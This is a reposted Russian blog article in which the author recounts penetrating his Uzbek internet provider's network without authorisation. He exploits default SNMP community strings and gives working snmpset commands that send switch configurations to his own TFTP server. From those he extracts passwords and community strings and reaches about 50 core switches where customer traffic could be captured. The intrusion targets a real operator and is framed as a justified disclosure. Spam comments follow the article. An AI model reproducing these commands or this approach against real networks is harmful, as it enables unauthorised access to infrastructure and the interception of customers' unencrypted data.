Русский
Русский
English
Статистика
Реклама

Пентест сети провайдера или почему не стоит доверять свои данные провайдерам в Узбекистане

Предыстория

Буквально несколько месяцев назад домашний интернет стал работать можно сказать ужасно, происходило это только по вечерам во время когда у провайдера нет людей которые могли бы выехать на место, письма, заявки и так далее не давали никаких результатов, говорят что специалист приедет днем, а что мне днем когда не работает вечером, так в один из дней я решил провести некоторые пентестерские изыскания в сети своего провайдера. Если вам стало интересно добро пожаловать под кат.

PT0.1ENUM

Решил начать сканирование с подсети 10.3X.X.0/24 т.к она светилась в трасерте несколько раз

насканив несколько свитчей с доступом по 80 порту решил проверить несколько других портов 161(SNMP) и 179(BGP) по итогу получил несколько свитчей с открытым SNMP и тут из всей пачки мне достался один с мисконфигом public и private не были удалены, что и сыграло мне на руку позже

PT1.1Gath

Получив доступ по SNMP к одному из свитчей определился что свитч этот DGS-3620-28SC гигабитный Управляемый L3 стекируемый коммутаторс 20портами SFP,4комбо-портами100/1000Base-T/SFPи4портами 10GBase-X SFP+, используя private community решил слить себе бэкап конфига что мне и удалось используя snmpset

snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.3.3 a $TFTP_SERVER_IPPsnmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.5.3 s $FILE_NAME.cfgsnmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.7.3 s config.cfgsnmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.8.3 i 2snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.12.3 i 3

покопав немного конфиг получаем пароль vfrtgb45switch(заменен в целях безопасности провайдера), а так же другое community string vfrtgb45switch и vfrtgb45switchrw теперь, пробежимся по остальным свитчам и добавим для удобства в последнюю виндовую версию The Dude, после этого мы увидим то что нам действительно нужно это MNGT vlan это 4002 с подсетью 172.2X.X.0/15

Потратил очень много времени на поиски места где же всё таки конфиг разрешает из сети юзера попасть в mngt vlan оказалось это еще несколько мисконфигов в некоторых свитчах, позже просканив еще несколько сетей я нашел свитч ARISTA-100G-CityPlace1 и его брата ARISTA-100GCityPlace2, в общем на данный момент у меня есть доступ к 50 L3 свитчам(до остальных в принципе он и не нужен), на которых спокойненько можно запустить TCPDUMP и собирать трафик всех наших прекрасных пользователей.

PT2.1 Разговор с провайдером

Спустя два месяца после получения первых доступов я добрался до ядра сети, но не стал делать всё плохо(хотя мог просто отключить консоль на всех свитчах, сменить community string и пароль), решил оформить все как надо, пообщаться с директором компании и объяснить ему что мисконфиги это плохо и надо проводить аудиты время от времени, но столкнулся с проблемой, связи с директором увы нет, админа которого мы нашли при помощи знакомых, откровенно сказал что это всё нае***ово и никто его сеть не сможет взломать. позже пошел в центральный офис, в пятницу, сказали что принимает только по вторникам, то есть ему пофиг как и админу, ок не стал торопить события, написал эту статью подготовился и пошел к нему во вторник, он меня не принял со словами завтра позвоню, в итоге на следующий день мне в лс постучался админ который так же котегорично сообщил что ему насрать на то что происходит, то есть компании Turon Telecom абсолютно пофигу безопасность данных которые передают их пользователи.

PT3.1 Для тех кто не смыслит в IT и будет читать это

Для обычного пользователя интернета данного провайдера это кажется не особо важным, но если вчитаться в это можно понять что в любой момент могут быть украдены Ваши логины и пароли от не зашифрованных служб например доступ к сайтам через HTTP, почту которую вы отправляете по SMTP, имея ваш IP адрес злоумышленник сможет видеть сайты которые вы посещали DNS, в общем полные доступы к вашим данным которые не имеют шифрования, это может стать очень пагубным для вас, я не один такой который сможет получить доступ к этой сети. так что люди думайте о своей безопасности!

PT4.1 Ожидание реакции

Сейчас дописал статью и в ожидании реакции или людей которые ее прочтут или реакции провайдера

Источник: habr.com
К списку статей
Опубликовано: 26.05.2021 18:20:11
0

Сейчас читают

Комментариев (0)
Имя
Электронная почта

Сетевые технологии

Сетевое оборудование

Isp

Безопасность данных

Узбекистан

Категории

Последние комментарии

  • Имя: Макс
    24.08.2022 | 11:28
    Я разраб в IT компании, работаю на арбитражную команду. Мы работаем с приламы и сайтами, при работе замечаются постоянные баны и лаги. Пацаны посоветовали сервис по анализу исходного кода,https://app Подробнее..
  • Имя: 9055410337
    20.08.2022 | 17:41
    поможем пишите в телеграм Подробнее..
  • Имя: sabbat
    17.08.2022 | 20:42
    Охренеть.. это просто шикарная статья, феноменально круто. Большое спасибо за разбор! Надеюсь как-нибудь с тобой связаться для обсуждений чего-либо) Подробнее..
  • Имя: Мария
    09.08.2022 | 14:44
    Добрый день. Если обладаете такой информацией, то подскажите, пожалуйста, где можно найти много-много материала по Yggdrasil и его уязвимостях для написания диплома? Благодарю. Подробнее..
© 2006-2024, personeltest.ru